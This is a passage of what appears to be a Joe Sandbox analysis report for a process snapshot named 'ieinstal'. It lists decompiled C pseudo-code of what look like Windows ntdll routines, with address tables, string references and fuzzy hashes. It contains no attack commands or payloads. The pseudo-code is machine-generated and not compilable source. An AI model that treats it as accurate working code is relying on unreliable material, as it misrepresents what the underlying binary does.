                                                            0x1ec7f79f
                                                            0x00000000
                                                            0x1ec7f74f
                                                            0x1ec7f74f
                                                            0x00000000
                                                            0x1ec7f74f

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Actx
                                                            • API String ID: 0-89312691
                                                            • Opcode ID: c48340f0804d378627c84659c343762601b0929b2aa82a73ac2eec7b1c3b0ff8
                                                            • Instruction ID: 2cd13c82baa9d56879de269866709f486af7bee51338bfe9a1967f0697d5ede8
                                                            • Opcode Fuzzy Hash: c48340f0804d378627c84659c343762601b0929b2aa82a73ac2eec7b1c3b0ff8
                                                            • Instruction Fuzzy Hash: 8311BF36F087C38BE7154E1F8CE171A7297BB96624F21472AE861CB399DB70C8C08740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED08DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 71%
                                                            			E1ED08DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1ed30d50);
				E1ECAD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E1ECE5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L1ECADEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L1ECADEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E1ECAD130(_t34, _t39, _t40);
			}





                                                            0x1ed08df1
                                                            0x1ed08df1
                                                            0x1ed08df1
                                                            0x1ed08df1
                                                            0x1ed08df1
                                                            0x1ed08df1
                                                            0x1ed08df3
                                                            0x1ed08df8
                                                            0x1ed08dfd
                                                            0x1ed08e00
                                                            0x1ed08e0e
                                                            0x1ed08e2a
                                                            0x1ed08e36
                                                            0x1ed08e38
                                                            0x1ed08e3c
                                                            0x1ed08e46
                                                            0x1ed08e46
                                                            0x1ed08e36
                                                            0x1ed08e50
                                                            0x1ed08e56
                                                            0x1ed08e59
                                                            0x1ed08e5c
                                                            0x1ed08e60
                                                            0x1ed08e67
                                                            0x1ed08e6d
                                                            0x1ed08e73
                                                            0x1ed08e74
                                                            0x1ed08eb1
                                                            0x1ed08ebd

                                                            Strings
                                                            • Critical error detected %lx, xrefs: 1ED08E21
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Critical error detected %lx
                                                            • API String ID: 0-802127002
                                                            • Opcode ID: 0b4a047165038a2edf801abb59ffc23a00784475db9413782ff9f745aa34222b
                                                            • Instruction ID: 9d9df024402f890f71b3732cc122c50f4f6829a072cd75177debf83617a68654
                                                            • Opcode Fuzzy Hash: 0b4a047165038a2edf801abb59ffc23a00784475db9413782ff9f745aa34222b
                                                            • Instruction Fuzzy Hash: D11175B9C10388DBDB14CFA489027CDFBB1BB04314F24471EE668AB282D7315602CF14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ECEFF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 1ECEFF60
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                            • API String ID: 0-1911121157
                                                            • Opcode ID: ec0c6dae3c5ea3dedc4d54ec5ff35b199097dc6211299b2ede918f68d0805091
                                                            • Instruction ID: 02eeb9db77721bdb7d18774c42ba6c4c14b03077c2b1d1ea18a6e5f0a03959a0
                                                            • Opcode Fuzzy Hash: ec0c6dae3c5ea3dedc4d54ec5ff35b199097dc6211299b2ede918f68d0805091
                                                            • Instruction Fuzzy Hash: F711A1769101C5EFDB05DF50CD44F987BB2BF44718F518654E50557AA1CB39A980CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED25BA5 Relevance: .6, Instructions: 592COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 88%
                                                            			E1ED25BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1ed31178);
				E1ECAD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E1ED24C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E1EC9D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E1ED25542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x1ed460e8;
								if( *0x1ed460e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x1ed460e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E1EC99710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E1EC96DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E1EC9F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E1EC9F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E1EC9F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E1EC9FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E1EC9FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E1EC9F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E1EC9F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E1ED24CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E1ECAD130(_t427, _t494, _t511);
				}
			}










































































                                                            0x1ed25ba5
                                                            0x1ed25baa
                                                            0x1ed25baf
                                                            0x1ed25bb4
                                                            0x1ed25bb6
                                                            0x1ed25bbc
                                                            0x1ed25bbe
                                                            0x1ed25bc4
                                                            0x1ed25bcd
                                                            0x1ed25bd3
                                                            0x1ed25bd6
                                                            0x1ed25bdc
                                                            0x1ed25be0
                                                            0x1ed25be3
                                                            0x1ed25beb
                                                            0x1ed25bf2
                                                            0x1ed25bf8
                                                            0x1ed25bfe
                                                            0x1ed25c04
                                                            0x1ed25c0e
                                                            0x1ed25c18
                                                            0x1ed25c1f
                                                            0x1ed25c25
                                                            0x1ed25c2a
                                                            0x1ed25c2c
                                                            0x1ed25c32
                                                            0x1ed25c3a
                                                            0x1ed25c3f
                                                            0x1ed25c42
                                                            0x1ed25c48
                                                            0x1ed25c5b
                                                            0x1ed25c5b
                                                            0x1ed25c2c
                                                            0x1ed25cb7
                                                            0x1ed25cb9
                                                            0x1ed25cbf
                                                            0x1ed25cc2
                                                            0x1ed25cca
                                                            0x1ed25ccb
                                                            0x1ed25ccb
                                                            0x1ed25cd1
                                                            0x1ed25cd7
                                                            0x1ed25cda
                                                            0x1ed25ce1
                                                            0x1ed25ce4
                                                            0x1ed25ce7
                                                            0x1ed25ced
                                                            0x1ed25cf3
                                                            0x1ed25cf9
                                                            0x1ed25cff
                                                            0x1ed25d08
                                                            0x1ed25d0a
                                                            0x1ed25d0e
                                                            0x1ed25d10
                                                            0x00000000
                                                            0x00000000
                                                            0x1ed25d16
                                                            0x1ed25d1a
                                                            0x00000000
                                                            0x00000000
                                                            0x1ed25d20
                                                            0x1ed25d22
                                                            0x1ed25d25
                                                            0x1ed25d2f
                                                            0x1ed25d2f
                                                            0x1ed25d33
                                                            0x1ed25d3d
                                                            0x1ed25d49
                                                            0x1ed25d4b
                                                            0x00000000
                                                            0x00000000
                                                            0x1ed25d5a
                                                            0x1ed25d5d
                                                            0x1ed25d60
                                                            0x00000000
                                                            0x00000000
                                                            0x1ed25d66
                                                            0x1ed25d69
                                                            0x00000000
                                                            0x00000000
                                                            0x1ed25d6f
                                                            0x1ed25d6f
                                                            0x1ed25d73
                                                            0x1ed25d79
                                                            0x1ed25d7f
                                                            0x1ed25d86
                                                            0x1ed25d95
                                                            0x1ed25d98
                                                            0x1ed25dba
                                                            0x1ed25dcb
                                                            0x1ed25dce
                                                            0x1ed25dd3
                                                            0x1ed25dd6
                                                            0x1ed25dd8
                                                            0x1ed25de6
                                                            0x1ed25dec
                                                            0x1ed25dee
                                                            0x1ed25df1
                                                            0x1ed25df3
                                                            0x1ed2635a
                                                            0x1ed2635a
                                                            0x00000000
                                                            0x1ed2635a
                                                            0x1ed25dfe
                                                            0x1ed25e02
                                                            0x1ed25e05
                                                            0x1ed25e07
                                                            0x1ed25e10
                                                            0x1ed25e13
                                                            0x1ed25e1b
                                                            0x1ed25e1c
                                                            0x1ed25e21
                                                            0x1ed25e22
                                                            0x1ed25e23
                                                            0x1ed25e25
                                                            0x1ed25e2a
                                                            0x1ed25e2c
                                                            0x1ed25e2e
                                                            0x1ed25e36
                                                            0x1ed25e39
                                                            0x1ed25e42
                                                            0x1ed25e47
                                                            0x1ed25e4d
                                                            0x1ed25e54
                                                            0x1ed25e54
                                                            0x1ed25e54
                                                            0x1ed25e2e
                                                            0x1ed25e5c
                                                            0x1ed25e5f
                                                            0x1ed25e62
                                                            0x1ed25e64
                                                            0x1ed25e6b
                                                            0x1ed25e70
                                                            0x1ed25e7a
                                                            0x1ed25e7a
                                                            0x1ed25e7a
